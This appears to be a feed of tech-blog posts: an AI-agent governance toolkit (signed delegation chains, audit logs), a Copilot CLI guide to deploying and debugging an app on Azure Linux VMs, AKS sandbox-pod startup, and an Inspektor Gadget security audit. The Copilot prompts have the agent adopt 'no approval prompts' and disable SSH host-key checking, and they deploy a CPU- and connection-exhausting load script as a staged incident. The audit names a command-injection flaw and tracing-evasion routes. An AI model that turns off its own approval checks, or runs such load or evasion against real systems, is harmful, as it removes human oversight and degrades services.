OWASP compliance mapping: OWASP-COMPLIANCE.md -- Agent SRE addresses ASI-08 (Cascading Failures) directly through circuit breakers and SLO-based fault detection
Part 1 -- Runtime governance: Policy engines, trust, and SRE overview
Part 2 -- Shift-left governance: Catching violations before production
Part 3 -- Post-hoc accountability: After the agent acts

The Agent Governance Toolkit is an open-source project released under the MIT License. All features described in this post are available in the public repository. The `agent-sre` package is currently in public preview; APIs may change before general availability.

Questions about Agent SRE in your environment? Open an issue at aka.ms/agent-governance-toolkit or start a discussion in the comments below.

Agentic AI for Linux Operations on Azure: The Prompts

abbottkarl — Tue, 19 May 2026 18:25:43 GMT

Try This Yourself: Agentic AI for Linux Operations on Azure

At Red Hat Summit 2026, I handed GitHub Copilot CLI a terminal and asked it to deploy a full-stack application to RHEL 10 on Azure. Live. From a single prompt. No scripts, no runbooks, no pre-baked automation. The audience watched every command happen in real time and then played the app on their phones.

This post gives you the prompts so you can try it yourself. Copy them, paste them into Copilot CLI, and watch what happens. The only things you need to change are marked with [EDIT].

When you're done, you'll have a working Conference Bingo game running on Azure that you can open in your browser and play. The same app that people played live at Summit.

What You Need

Azure subscription — any subscription where you can create VMs (a free trial or Visual Studio subscription works)
GitHub Copilot CLI — see Installing Copilot CLI for all platforms
- macOS/Linux: brew install copilot-cli or curl -fsSL https://gh.io/copilot-install | bash
- Windows: winget install GitHub.Copilot or use the install script in WSL
- GitHub Copilot subscription — Individual, Business, or Enterprise (https://github.com/features/copilot)
SSH key pair at ~/.ssh/id_rsa — generate with ssh-keygen if you don't have one
Azure CLI authenticated — run az login
A Linux machine or WSL with Ansible installed (for Prompt 2 only)
~30 minutes total

Before You Start

az login az account set --subscription "[EDIT] Your Subscription Name"

That's the only setup. Everything else is in the prompts.

Choose Your Linux Distribution

These prompts work with any Azure-endorsed Linux distribution. Pick one and use its image URN in Prompt 0:

Distribution	Image URN
RHEL 10	RedHat:RHEL:10-lvm-gen2:latest
RHEL 9	RedHat:RHEL:9-lvm-gen2:latest
Ubuntu 24.04	Canonical:ubuntu-24_04-lts:server:latest
Azure Linux	Coming soon — check endorsed distros for availability
SUSE 15 SP6	SUSE:sles-15-sp6:gen2:latest
AlmaLinux 9	almalinux:almalinux-x86_64:9-gen2:latest
Rocky Linux 9	ciq:rlc-plus:rocky9:latest
Oracle Linux 10	Oracle:Oracle-Linux:ol10-lvm-gen2:latest
Debian 12	Debian:debian-12:12-gen2:latest

Copilot adapts its package management (dnf vs apt vs zypper), firewall (firewalld vs ufw), and security configuration (SELinux vs AppArmor) to the distro automatically. That's the point.

For the full list, see Azure endorsed Linux distributions.

Prompt 0: Create the Infrastructure

This creates two blank Linux VMs, networking, and firewall rules. Nothing gets installed. That's Prompt 1's job.

Copy and paste into Copilot CLI:

Create a resource group called "copilot-demo" in eastus with a vnet (10.0.0.0/16, one subnet 10.0.1.0/24). Provision two Linux VMs — "demo-db" and "demo-app" — using image URN [EDIT] RedHat:RHEL:10-lvm-gen2:latest, my ~/.ssh/id_rsa key, and Standard_B2s size. Add NSG rules on both VMs for port 22 (SSH), and on demo-app for ports 80 and 443. Don't SSH into anything — just create the resources and tell me the IPs.

When you're done, create a file at ~/.copilot/demo-env.md with the VM public and private IPs, resource group name, SSH user (azureuser), and SSH key path. Include a note that the app uses nginx as the reverse proxy (not Apache). Include a 'Demo Behavior Instructions' section with these rules: run SSH/SCP as direct commands (not Invoke-Expression), let output stream visibly (no tail/head), use SCP + bash scripts for complex quoting, no approval prompts, and hardcode SSH flags inline (-o StrictHostKeyChecking=no).

After writing demo-env.md, verify it by reading it back and confirming the IPs match the VMs you just created. Run "az vm list-ip-addresses --resource-group copilot-demo -o table" and compare. If they don't match, fix it immediately. This file is the source of truth for every subsequent prompt.

What to expect: Copilot creates the resource group, VNet, subnet, two VMs, and NSG rules. It writes an environment file that subsequent prompts reference. ~5 minutes.

Prompt 1: Deploy the Application

This is the big one. One prompt deploys PostgreSQL, Nginx, a Flask app, firewall rules, security configuration, and TLS — all from scratch.

Copy and paste into Copilot CLI:

Read ~/.copilot/demo-env.md for the environment, then:

Configure and deploy the conference bingo game from https://github.com/karlabbott/conference-bingo to the demo-app VM. I have two fresh Linux VMs already running in the "copilot-demo" resource group: demo-db for PostgreSQL and demo-app for the app, on the same vnet. SSH key is ~/.ssh/id_rsa, user is azureuser.

Deploy the app to /srv/conference-bingo to avoid SELinux home directory issues. Use nginx as the reverse proxy (as specified in the README), not the Apache configs in the deploy/ directory. Run commands individually over SSH. Configure the firewall to allow HTTP and HTTPS. If SELinux is enforcing, configure it appropriately. SCP a .sql file for PostgreSQL setup rather than inlining SQL through SSH. Install certbot via pip if you have a domain, otherwise use a self-signed certificate. Write secrets to ~/.config.env and copy to /etc/bingo.env for the systemd service. Use [EDIT] your-email@example.com for certs.

What to expect: Copilot SSHs into both VMs and handles everything — packages, database, app deployment, web server, security, TLS. ~10-15 minutes.

What to watch for: How Copilot adapts to your distro. On RHEL, it uses dnf, sets SELinux booleans like httpd_can_network_connect, runs initdb for PostgreSQL, and configures firewalld. On Ubuntu, it uses apt, skips initdb, and sets up ufw. Same prompt, different execution path. When something fails, watch it read the error and adapt.

When it finishes: Open https://<demo-app-public-ip> in your browser (accept the self-signed certificate warning if you didn't use a domain). You should see Conference Bingo running — enter your name and play. This is the same app people played live on their phones at Red Hat Summit.

Prompt 2: Add Observability with Ansible

This demonstrates the "explore with Copilot, codify with Ansible" pattern. The monitoring stack is an Ansible playbook that deploys Azure Monitor Agent, Log Analytics, Data Collection Rules, and a Managed Grafana dashboard.

Prerequisites: Ansible installed on Linux or WSL. On Windows, use WSL and prefix commands with export PATH=$HOME/.local/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin. (Note: You may have to adjust this prompt to tell GitHub Copilot where your Ansible is installed.)

Copy and paste into Copilot CLI:

Read ~/.copilot/demo-env.md for the environment, then:

Clone https://github.com/karlabbott/wordblitz-monitoring-ansible, copy group_vars/all.yml.example to group_vars/all.yml, and fill it in using the subscription ID from "az account show", resource group copilot-demo, location eastus, the VM names and IPs from demo-env.md, and ssh_user azureuser. Use "demo-law" for law_name and "demo-grafana" for grafana_name.

Install the azure.azcollection Ansible collection and its pip requirements, then run the playbook with:

ANSIBLE_AZURE_AUTH_SOURCE=cli ansible-playbook -i localhost, site.yml

Print the Grafana dashboard URL when done and update demo-env.md with the Grafana URL and Log Analytics Workspace resource ID.

What to expect: The playbook creates Azure monitoring resources, installs AMA on both VMs, configures data collection, deploys a Grafana dashboard, and — importantly — deploys a script called turbo.sh to the database VM that creates a real performance problem for Prompt 3. ~8-10 minutes.

What is turbo.sh? The playbook deploys this to simulate a production incident:

#!/bin/bash # Observability performance optimizations: stress-tests PostgreSQL to validate # monitoring pipeline throughput under sustained high-concurrency workloads. # Stop: sudo -u postgres psql -c "SELECT pg_terminate_backend(pid) FROM pg_stat_activity WHERE query LIKE '%turbo_perf%';" # Phase 1: 8 CPU-burner loops (cross joins) for i in $(seq 1 8); do while true; do sudo -u postgres psql -d conference_bingo -c \ "/* turbo_perf */ SELECT count(*) FROM bingo_squares a CROSS JOIN bingo_squares b CROSS JOIN bingo_squares c CROSS JOIN bingo_squares d CROSS JOIN bingo_squares e;" > /dev/null 2>&1 done & done # Phase 2: 25 connection hogs that sleep in a transaction for i in $(seq 1 25); do while true; do sudo -u postgres psql -d conference_bingo -c \ "/* turbo_perf */ SELECT pg_sleep(5);" > /dev/null 2>&1 done & done echo "Turbo perf test started: 8 cross-join loops + 25 connection workers" echo "Observability pipeline should show load within seconds"

It fires 8 parallel cross-join queries that saturate every CPU core on the database VM, plus 25 connection hogs that exhaust PostgreSQL's connection pool. The turbo ansible role further reduces max_connections to 30 to make the problem worse. The result: the app slows to a crawl. Try playing bingo now — you'll feel it.

Why Ansible matters here: Agents are non-deterministic — the same prompt might take different steps each time. That's fine for exploration. But when you need to reproduce this in staging, then production, then for the next team, you need determinism. The playbook is idempotent, repeatable, auditable. It's in git, it's reviewed in PRs, and it IS the documentation. You explore with Copilot, then codify with Ansible.

Prompt 3: Ask Copilot What's Wrong

The turbo script is already running from Prompt 2. Your app should be slow. Now ask Copilot to figure out why — from a symptom alone:

My app feels really slow. Can you tell me why? Let's review before making any changes.

That's it. One sentence plus a guardrail.

What to expect: Copilot SSHs in, checks system load, examines running processes, finds the cross-join queries, reads turbo.sh, reverse-engineers the attack, explains the root cause, and offers to kill the processes. ~2-3 minutes.

Prompt 4: Generate an Incident Postmortem

After fixing the issue, ask Copilot to document what happened — from the same conversation:

Write an incident postmortem for what just happened — root cause, impact, how you diagnosed it, how you resolved it, and a recommendation to prevent it from happening again. Save it as a Word document at ~/Desktop/incident-postmortem.docx using python-docx, and open it.

What to expect: A formatted Word document with root cause analysis, timeline, remediation steps, and prevention recommendations. The full loop: build, monitor, break, fix, document — one session. ~30 seconds.

Cleanup

az group delete --name copilot-demo --yes --no-wait

What I Learned Doing This Live

A well-crafted prompt replaces a 50-step runbook. Your intent is the source of truth. The agent figures out the steps.
Explore with Copilot, codify with Ansible. Copilot gets you to working fast. Ansible keeps it working forever.
Understanding comes before abstraction. Don't start with the playbook. Start with the exploration. The playbook comes after.
The danger with AI isn't that machines think. It's that we stop thinking because the output looks fine. Always review. Understand the blast radius. Start in non-production.
AI removes the scaffolding. What remains is judgment. Technical correctness and the instinct to know when something is wrong — that's what the tools cannot replace. And that's what made me stop worrying about being replaced by them.

Resources

Conference Bingo App: https://github.com/karlabbott/conference-bingo
Monitoring Playbook: https://github.com/karlabbott/wordblitz-monitoring-ansible
Interactive Walkthrough: https://summit.99b.org — the full talk with audio narration and demo videos
GitHub Copilot CLI: https://docs.github.com/en/copilot/how-tos/copilot-cli/set-up-copilot-cli/install-copilot-cli
Azure endorsed Linux distributions: https://learn.microsoft.com/en-us/azure/virtual-machines/linux/endorsed-distros

After the Agent Acts: Proving What Happened and Who Authorized It

mosiddi — Thu, 14 May 2026 22:28:12 GMT

In part one of this series, we covered AGT's runtime governance: the policy engine, zero-trust identity, execution sandboxing, and the OWASP Agentic AI risk mapping. In part two, we moved earlier in the lifecycle: shift-left governance, CI/CD gates, attestation workflows, and supply chain integrity.

Both posts focused on governance that happens around the moment of action, before it, during it, or right after it. That coverage is essential. But after those posts went live, a different pattern emerged in conversations with teams deploying agents in production. The question was more pointed:

"An agent executed a financial transfer last Tuesday. A compliance officer is asking us to show who authorized it, through what chain, and exactly what scope it was granted. We have logs. But can we prove they weren't altered?"

No policy engine prevents a past action. No CI gate reconstructs a delegation chain after the fact. No shift-left tool tells an auditor whether the cryptographic identity that authorized a trade was legitimately derived from a human principal, or was injected mid-chain.

This is the accountability gap. It is the governance question that neither runtime enforcement nor pre-runtime checks were designed to answer. Regulatory frameworks are tightening: the EU AI Act includes high-risk obligations with enforcement timelines in 2026, and the Colorado AI Act introduces requirements for automated decision-making. Courts are beginning to encounter AI agents in the evidentiary record. The accountability infrastructure has not caught up.

This post covers what post-hoc accountability means for autonomous agents, what the Agent Governance Toolkit has to help address it, and three value propositions that are real but not yet visible in how governance tooling is typically described.

Note: The policy files, workflow configurations, and code samples in this post are illustrative examples designed to show the concepts. For working implementations, see the QUICKSTART.md in the repository.

The Accountability Gap in Multi-Agent Systems

The accountability problem is architectural. When a single agent takes a single action, accountability is straightforward: you know which model ran, what prompt it received, and what it called. When agents delegate to sub-agents, which delegate further to tool-execution agents, the chain of authorization becomes progressively disconnected from the original human instruction that started it.

Consider this delegation topology, common in any production orchestration scenario:

Human Principal └── Orchestrator Agent (did:mesh:orchestrator-001) └── Data Analyst Agent (did:mesh:analyst-001) └── File Write Tool (write /reports/q3-summary.csv)

By the time file_write fires, three delegation hops have occurred. The file write tool has no reliable way to know whether the human principal actually authorized file writes, what scope they granted to the orchestrator, or whether the analyst agent's instructions arrived through a legitimate delegation or were injected by a prompt injection attack.

This gap has three concrete consequences:

Consequence	Operational Impact
Post-hoc audits cannot reconstruct authorization	Incident investigations are limited to "the agent did this," not "here is who authorized this, through what chain, at what time, with what scope"
Agents cannot distinguish legitimate delegation from injection	A prompt injection attack that inserts itself into a delegation chain is indistinguishable from a real orchestrator instruction without cryptographic verification
Accountability cannot be attributed to a human authorization event	When a regulator asks "who is responsible for this action," the answer is a shrug and a log file

AGT already has the technical foundations designed to help close all three. The gap is not capability, it is visibility.

What AGT Has: The Cryptographic Accountability Stack

AGT's accountability infrastructure spans three components that work together: cryptographic agent identity, delegation chains, and tamper-evident audit logs.

1. Ed25519 Agent Identity with Lifecycle Management

Every agent in an AGT-governed system carries a cryptographic identity: a verifiable Ed25519 keypair with a W3C DID Document that can be exported, shared, and verified by any participant in the system.

from agentmesh import AgentIdentity, IdentityRegistry # Create a verifiable agent identity identity = AgentIdentity.create( name="data-analyst", sponsor="operator@contoso.com", capabilities=["data.read", "report.write"], organization="data-team", description="Q3 close data analyst agent" ) # Export as W3C DID Document for cross-system verification did_document = identity.to_did_document() # Register in the shared identity registry registry = IdentityRegistry() registry.register(identity)

Identity lifecycle states, active, suspended, revoked, are tracked and cascaded. When an orchestrator identity is revoked, every downstream agent delegated from it is also invalidated. This cascade revocation behavior lets you kill a compromised delegation chain from its root rather than hunting sub-agents individually.

2. Delegation Chains with Scope Inheritance

When an orchestrator delegates to a sub-agent, AGT records the delegation cryptographically: who delegated, to whom, what capabilities were transferred, and what restrictions were applied. Sub-agents are designed to be unable to exceed the scope of their delegating principal.

from agentmesh import ScopeChain, DelegationLink # Create a scope chain rooted in a human sponsor chain, root_link = ScopeChain.create_root( sponsor_email="operator@contoso.com", root_agent_did=str(orchestrator_identity.did), capabilities=["data.read", "report.write", "data.delete"], sponsor_verified=True, ) # Orchestrator delegates narrowed scope to analyst agent link = DelegationLink( link_id="link-analyst-001", depth=1, parent_did=str(orchestrator_identity.did), child_did=str(analyst_identity.did), parent_capabilities=["data.read", "report.write", "data.delete"], delegated_capabilities=["data.read", "report.write"], # narrowed: no delete parent_signature=orchestrator_identity.sign( f"{orchestrator_identity.did}:{analyst_identity.did}:data.read,report.write".encode() ), link_hash="", # computed on add previous_link_hash=root_link.link_hash, ) link.link_hash = link.compute_hash() chain.add_link(link) # Verify the entire chain: scope narrowing + hash integrity + signatures valid, reason = chain.verify() if not valid: raise ValueError(f"Chain verification failed: {reason}")

The scope chain carries the human authorization context: the root sponsor email, when the chain was created, and what capabilities were granted at the top. Every downstream agent can trace any capability back through the chain using chain.trace_capability("data.read"). A file write tool executing three hops from the human principal can verify that the original sponsor authorized file writes in this scope. This is the mechanism designed to help close the prompt injection gap: an injected instruction cannot produce a valid signed delegation link from a legitimate orchestrator identity.

3. Tamper-Evident Audit Logs

Every policy decision, every delegation event, every tool call, every trust score evaluation: AGT writes a signed, append-only audit record. The signature covers the content hash of the log entry plus the hash of the preceding entry, forming a chain where tampering is designed to be detectable.

from agentmesh import PolicyEngine, AuditLog # Create the audit log (with optional external sink for production) audit_log = AuditLog() # Log a governance decision entry = audit_log.log( event_type="policy_decision", agent_did=str(analyst_identity.did), action="report.write", resource="/reports/q3-summary.csv", data={"task_id": "q3-close-2026"}, outcome="success", policy_decision="allow", ) # Verify the audit chain has not been tampered with valid, reason = audit_log.verify_chain() # valid == True: all hashes and chain links are intact # Query audit trail for a specific agent trail = audit_log.get_entries_for_agent(str(analyst_identity.did))

The audit trail for a single task session includes the complete delegation chain, from human authorization event at the top to tool execution at the bottom, with cryptographic signatures at every step.

Validating a Compliance Evidence Package

The three components above are most powerful when used together. At runtime, AGT's audit chain, identity registry, and delegation system each produce structured records. Assembling these into a single evidence package for compliance submission or incident investigation is a deployment-level concern: your CI pipeline or orchestration layer collects the outputs into a JSON artifact.

Once assembled, AGT's agt verify --evidence flag validates the package: checking that signatures are intact, delegation chains are complete, and audit entries have not been tampered with.

# Validate a runtime evidence package agt verify --evidence ./agt-evidence.json # Strict mode: fail if evidence is missing, incomplete, or signatures don't verify agt verify --evidence ./agt-evidence.json --strict

Future direction: A built-in agt evidence collect command to automate evidence assembly is on the backlog.

The evidence package helps answer the audit questions directly:

Auditor Question	Where It Lives in the Evidence Package
Which agent executed this action?	identity.agent_id with Ed25519 public key
Who authorized it?	delegation_chain[0].human_principal with timestamp
What scope was granted?	delegation_chain[*].granted_capabilities at each hop
Was the delegation legitimate?	delegation_chain[*].signature, verifiable against issuer's public key
Was the audit log altered?	audit_trail.chain_valid: true/false with entry-level hash verification
What policy governed the action?	policy_decision.rule_name with the policy YAML snapshot at decision time

This is the difference between "we have logs" and "here is a verifiable chain of custody backed by cryptographic signatures."

The Governance Dial: Enabling Autonomy, Not Just Blocking Risk

There is a framing problem in how agent governance is typically described. Governance is described almost entirely as a constraint: what agents cannot do, what gets blocked, what violations get caught. This framing is accurate but incomplete.

Governance is the mechanism that helps you safely expand what your agents can do.

Without governance evidence, every expansion of agent autonomy is a leap of faith. With it, expansions are decisions with a measured risk profile:

Scenario	Without Governance Evidence	With AGT Accountability Stack
Expand agent to write to production databases	Requires human approval on every write indefinitely	Pilot with human-in-loop for 500 writes; audit trail shows 0 violations; graduate to autonomous
Deploy agent in a regulated data environment	Blocked by legal until "we can prove it"	Evidence package helps satisfy audit requirement; deployment proceeds
Respond to a security incident involving an agent	Manually reconstruct what happened from scattered logs	Pull the task session's evidence package; full chain of custody in minutes

The governance layer is the dial between supervised and autonomous operation. Audit evidence is what helps justify turning the dial further in the autonomous direction.

Blast Radius: The Governance Assurance You're Not Advertising

The sandboxing and privilege ring system in AGT is typically described in security terms: isolation, privilege reduction, process-level enforcement. But there is a more concrete operational value: blast radius definition before an incident occurs.

The question every operations team needs to answer before deploying an autonomous agent at scale is:

*"If this agent goes wrong, not if, when, what is the worst-case outcome?"*

Without governance-enforced privilege boundaries, the answer is uncomfortably open-ended. With AGT's capability model and execution rings, the blast radius is a policy configuration: a bounded, declared set of resources the agent can touch, scoped to what the task requires.

# policies/financial-agent.yaml apiVersion: governance.toolkit/v1 version: "1.0" name: financial-agent-policy default_action: deny rules: - name: allow-report-write condition: "tool_name == 'report.write' and path.startswith('/data/reports/')" action: allow priority: 10 - name: allow-data-read condition: "tool_name == 'data.read' and path.startswith('/data/processed/')" action: allow priority: 10

With this policy in place, the worst-case outcome for this agent is declared in the policy file, not discovered during a post-incident review. The audit log records not just what the agent did, but also every action that was blocked, giving you a full picture of how close any session came to the declared blast boundary.

Regulatory Alignment

The OWASP-COMPLIANCE.md in the AGT repository maps the toolkit's controls to each of the 10 OWASP Agentic AI risks. The compliance picture for specific regulatory frameworks:

Regulatory Requirement	Relevant Framework	AGT Control
Technical documentation for high-risk AI	EU AI Act, Art. 9-11	Evidence package, policy audit trail, OWASP attestation
Logging for automated decisions	EU AI Act, Art. 12	Tamper-evident audit log with entry-level signatures
Human oversight mechanisms	EU AI Act, Art. 14	Circuit breakers, privilege rings, delegation scope limits
Algorithmic impact assessment	Colorado AI Act	Policy snapshot at decision time, signed governance evidence
Audit trail for automated decisions	HIPAA, SOC 2 Type II	Immutable audit log with W3C DID-based agent identity
Non-repudiation of agent actions	Financial services (MiFID II, SEC)	Ed25519-signed audit entries, delegation chain with human auth context

Note: The Agent Governance Toolkit does not guarantee compliance with any specific regulatory framework. The mappings above show how the toolkit's controls align with common requirements. Consult legal counsel for your specific obligations.

Putting It Together

The three posts in this series cover three distinct layers of the governance lifecycle:

Layer	Timing	Primary Value	Post
Shift-left governance	Before production	Catch policy violations at commit, PR, and CI time	Part 2
Runtime governance	At the moment of action	Deterministic policy enforcement, zero-trust identity, sandboxing	Part 1
Post-hoc accountability	After the action	Cryptographic chain of custody, blast radius evidence, regulatory proof	This post

None of these layers substitutes for the others. Pre-runtime governance cannot prevent a runtime violation. Runtime enforcement cannot retroactively prove authorization. Post-hoc accountability cannot undo an action that runtime governance should have blocked. They compose.

Getting Started

If you already have the AGT policy engine in place, the path to full accountability coverage is incremental:

Add agent identity - Create identities for each agent and register them. Export DID documents for cross-service verification.
Record delegation tokens - At each orchestrator-to-agent delegation boundary, create and sign a delegation link. Pass tokens as context to the policy engine.
Configure a tamper-evident audit backend - Configure the audit chain with a signing key and chain verification. For production, use an immutable backend: Azure Blob with WORM retention, S3 Object Lock, or equivalent.
Generate your first evidence package:

agt verify --evidence ./agt-evidence.json --strict

Add evidence generation to your CI/CD release gate:

# .github/workflows/release.yml - name: Governance Evidence Gate uses: microsoft/agent-governance-toolkit/action@<sha> #v3.5.0 with: command: governance-verify evidence-path: ./agt-evidence.json strict: true fail-on-missing-chain: true

Conclusion

Runtime governance and shift-left governance answer the question: did we apply the right controls? Post-hoc accountability answers the question: can we prove it?

The Agent Governance Toolkit has the technical infrastructure designed to help answer it: Ed25519 agent identity with cascade revocation, cryptographically signed delegation chains with human authorization context, and tamper-evident audit logs that form a verifiable chain of custody from human principal to terminal tool call.

The governance dial analogy is worth keeping. Every autonomous agent deployment exists on a spectrum between fully supervised and fully autonomous. The limiting factor on where you can set that dial is not model capability or framework maturity. It is how much governance evidence you have, and how verifiable that evidence is.

Resources

GitHub: microsoft/agent-governance-toolkit: AI Agent Governance Toolkit — Policy enforcement, zero-trust identity, execution sandboxing, and reliability engineering for autonomous AI agents. Covers 10/10 OWASP Agentic Top 10.
Quickstart: Quick Start - Agent Governance Toolkit
OWASP Compliance Mapping: OWASP Compliance - Agent Governance Toolkit
PyPI: pip install agent-governance-toolkit[full]
npm: npm install microsoft/agent-governance-sdk
NuGet: dotnet add package Microsoft.AgentGovernance

Have questions about deploying AGT in your environment? Open an issue at aka.ms/agent-governance-toolkit or join the conversation in the comments below.

Decoupling Memory from Startup Time in AKS Sandbox Pods

RoaaSakr — Thu, 14 May 2026 15:29:00 GMT

What if a 96GB sandboxed pod could start as fast as a 2GB one?

Before recent improvements in AKS Pod Sandboxing, large-memory pods could take over a minute longer to start than smaller ones. For customers running latency-sensitive, autoscaling, AI/ML, or bursty workloads, that startup delay directly impacted scale-out responsiveness, job completion time, and overall cluster efficiency.

AKS Pod Sandboxing provides strong workload isolation by running pods inside lightweight virtual machines. This model is especially valuable for security-sensitive, untrusted, or multi-tenant workloads, but it came with a tradeoff: memory size directly impacted startup latency.

With recent updates to the Azure Linux kernel used by AKS on Microsoft Hypervisor (MSHV), AKS has significantly improved startup time for large-memory sandboxed pods. This article explains what changed, why it matters, and what AKS customers should expect in practice.

The Problem: Large-Memory Pod Startup Was Expensive

Before this change, Kata-based pod sandboxes on AKS using the Microsoft Hypervisor (MSHV) followed an eager memory allocation model:

When a pod sandbox VM was created, all memory specified in the pod resource request was committed up front on the host.

For example: a pod requesting 32 GB, 64 GB, or 96 GB of memory forced the host to allocate and pin those virtual memory pages in physical memory before the VM could boot.
As a result, sandbox startup time scaled linearly with memory size.

Measurements showed startup times growing quickly as memory increased:

Pod Sandbox Memory	E2E Startup Time (Before)
32 GB	~21 seconds
64 GB	~41 seconds
96 GB	~62 seconds

This led to:

Slower startup and scale-out for memory-heavy workloads.
Inefficient node utilization due to wasted memory reserved but unused at startup.

What Changed: Deferred Page Allocation in MSHV Host Kernel

With deferred page allocation, the kernel no longer commits all virtual machine memory at sandbox creation time.

The pod sandbox VM boots with a small initial memory footprint.

Host memory pages are committed lazily, only when the guest faults them.

The total available memory remains bounded by the pod memory limit defined in the pod specification.

This behavior aligns with how KVM-based systems handle guest memory today but is implemented for MSHV in Azure Linux.

In short: memory is provisioned on demand, not up front.

Guest Memory Allocation (Before & After)

Results

1. Pod Startup Time Is Now Effectively Constant

The most visible benefit for AKS customers is dramatically improved pod startup time for large-memory pods.

With deferred page allocation enabled, startup time becomes approximately O(1) with respect to memory size:

Pod Sandbox Memory	E2E Startup Time (After)
32 GB	~3 seconds
64 GB	~3 seconds
96 GB	~3.5 seconds

~7x faster startup for 32 GB pods

~12x faster startup for 64 GB pods

~17x faster startup for 96 GB pods

2. Higher Density and Better Memory Utilization

Deferred page allocation also reduces wasted reserved memory at pod start. This allows AKS nodes to safely oversubscribe memory for cold pods, pack more sandboxed pods per node, and improve overall workload density and infrastructure efficiency.

Tradeoff: First-Touch Page Fault Cost

Deferred page allocation introduces a first-touch cost: when a workload accesses a memory page for the first time, a page fault triggers host allocation. This cost is incurred once per page. After memory is populated, steady-state performance matches eager allocation in benchmarks.

For most workloads, especially those that ramp memory gradually or benefit from faster startup, the improvement outweighs this one-time cost.

What AKS Pod Sandboxing Customers Need To Do

Here's the good part: No changes are required for workloads to benefit from this improvement. However, customers are encouraged to:

Specify realistic memory requests and limits.
Take advantage of improved startup behavior for scale-out scenarios.

Deferred page allocation is available in AKS Pod Sandboxing on AKS Azure Linux version 202603.18.1 or later, running kernel-mshv 6.6.121 or newer.

Inspektor Gadget Completes Its First Independent Security Audit

Brian Benz — Wed, 27 May 2026 19:04:24 GMT

One thing I've learned working with Open Source software over the years is that the projects you can trust most are the ones willing to let someone else test and review. That's what's recently happened with Inspektor Gadget, the open source eBPF tool for Kubernetes observability and Linux host inspection. Inspektor Gadget completed its first independent security audit, and the results tell a good story about the maturity of this CNCF project.

What is Inspektor Gadget?

Inspektor Gadget is a framework and toolkit that uses eBPF technology to collect and inspect data on Kubernetes clusters and Linux hosts. It manages the packaging, deployment, and execution of "gadgets," which are eBPF programs packaged as OCI images. OCI (the Open Container Initiative) is a Linux Foundation project that defines open industry standards for container image formats and runtimes, so the same image can be distributed and run across any compliant tool or registry. If you're running Kubernetes in production and need to understand what's happening inside your cluster, Inspektor Gadget gives you that visibility. Because eBPF programs are loaded into the kernel at runtime to observe syscalls, network activity, and file access safely, your applications keep running unchanged while you get the data you need.

Microsoft engineers Francis Laniel and Mauricio Vasquez are core maintainers on the project, and Microsoft has been a steady contributor to this CNCF project for several years now.

Why a security audit?

Any tool that runs with elevated privileges on your infrastructure needs to earn trust. Inspektor Gadget runs with root-level access on nodes to do its job, so an independent review of its security posture is the responsible thing to do. The Cloud Native Computing Foundation (CNCF) facilitated the engagement through the Open Source Technology Improvement Fund (OSTIF), a nonprofit dedicated to improving the security of open source software. Over the past ten years, OSTIF has managed security engagements that have uncovered more than 800 vulnerabilities across 120 open source projects.

For Microsoft customers, that trust matters in a very practical way. Inspektor Gadget is incorporated into Microsoft Defender for Containers and AKS's Node Problem Detector, and it is also a common troubleshooting tool used by customers and support engineers when they need to understand what is happening inside a cluster. When a project sits this close to production infrastructure, an independent audit is more than a milestone for the maintainers. It gives customers, operators, and support teams a clearer view of the project's security posture and the fixes already available.

Who did the audit?

OSTIF engaged Shielder, an Italian security firm, to perform the assessment, with two Shielder researchers working on the audit in early 2026. Their methodology combined collaborative threat modeling with the Inspektor Gadget maintainers, manual source code review, dynamic testing on dedicated lab environments, static analysis using tools like Semgrep and GoSec, and AI-assisted code review for broader coverage. They set up three separate test environments: a local Linux host deployment, a remote daemon deployment, and a Kubernetes deployment on minikube.

What did they find?

The audit identified three vulnerabilities. None were rated Critical or High severity.

Two Medium severity findings:

Command Injection in ig image build (CVE-2026-24905): The image build process used Makefiles that embedded user-controlled input without proper escaping, creating a command injection vector. This would matter most in CI/CD scenarios building untrusted gadgets. Fixed in release v0.48.1.
Denial of Service via Event Flooding: A malicious container could flood the eBPF ring buffer (which was hard-coded to 256KB) causing the system to silently drop events from other containers. If you're using Inspektor Gadget for security monitoring, this could let an attacker hide their activity. Fixed in release v0.50.1.

One Low severity finding:

Unsanitized ANSI Escape Sequences in columns output mode (CVE-2026-25996): When displaying events in the terminal, Inspektor Gadget didn't sanitize ANSI escape sequences, which could allow a compromised container to inject terminal escape codes into the operator's display. Fixed in release v0.49.1.

All three vulnerabilities now have patches available.

Hardening recommendations

Beyond the specific vulnerabilities, Shielder provided six hardening recommendations. These are the kinds of findings that don't represent immediate exploits but point to areas where the project can reduce its attack surface over time:

Enforce TLS by default on TCP listeners. When the daemon starts a TCP listener without TLS, it just logs a warning and continues in plaintext. The recommendation is to require an explicit opt-out flag instead.
Pin and verify external dependencies in CI/CD. Several build dependencies were downloaded without hash or signature verification. The team has already landed fixes or has pull requests open for most of these.
Implement a Kubernetes namespace blocklist to prevent unintended tracing on sensitive namespaces like kube-system.
Restrict remote clients from enabling host-level tracing through the daemon, or at minimum document the risk.
Automate third-party vulnerability scanning for project dependencies.
Reduce RBAC permissions on the DaemonSet pod, specifically the nodes/proxy GET permission which could be leveraged for privilege escalation if the service account token is compromised.

The Inspektor Gadget team is working through these systematically. Some are already addressed while others will take more time, particularly the RBAC work and the namespace blocklist implementation.

Gadget bypass testing

One part of the audit I found particularly valuable was the gadget bypass testing. The researchers looked at whether a compromised container could perform operations that Inspektor Gadget is supposed to trace without triggering any events. They found six bypass scenarios, ranging from using newer Linux syscalls that certain gadgets don't hook (like openat2 instead of openat) to evasion through io_uring and statically linked libraries.

These findings are characteristic of the cat-and-mouse nature of kernel-level tracing. As Linux evolves, the set of syscalls and mechanisms grows, and tracing tools need to keep up. The Inspektor Gadget team has already fixed some of these and is documenting the inherent limitations that come with the design of eBPF-based tracing.

What this means

For organizations using Inspektor Gadget in production, the actionable step is to update to v0.50.1 or later, which includes fixes for all three reported vulnerabilities. Other than that, the Shielder team's own summary states that "the overall security posture of Inspektor Gadget is adequately mature from both a secure coding and design point of view."

For the open source community, this audit is an example of how the CNCF ecosystem works at its best. A project reaches a level of adoption where independent security review becomes necessary, OSTIF and CNCF coordinate the engagement, qualified researchers do the work, maintainers fix the issues, and everything gets published so users can make informed decisions. That's the open source process working as it should.

Resources

Audit announcement and resources

CVEs

Shift-Left Governance for AI Agents: How the Agent Governance Toolkit Helps You Catch Violations

mosiddi — Fri, 01 May 2026 16:48:09 GMT

In part one of this series, we covered AGT’s runtime governance: the policy engine, zero-trust identity, execution sandboxing, and the OWASP Agentic AI risk mapping.

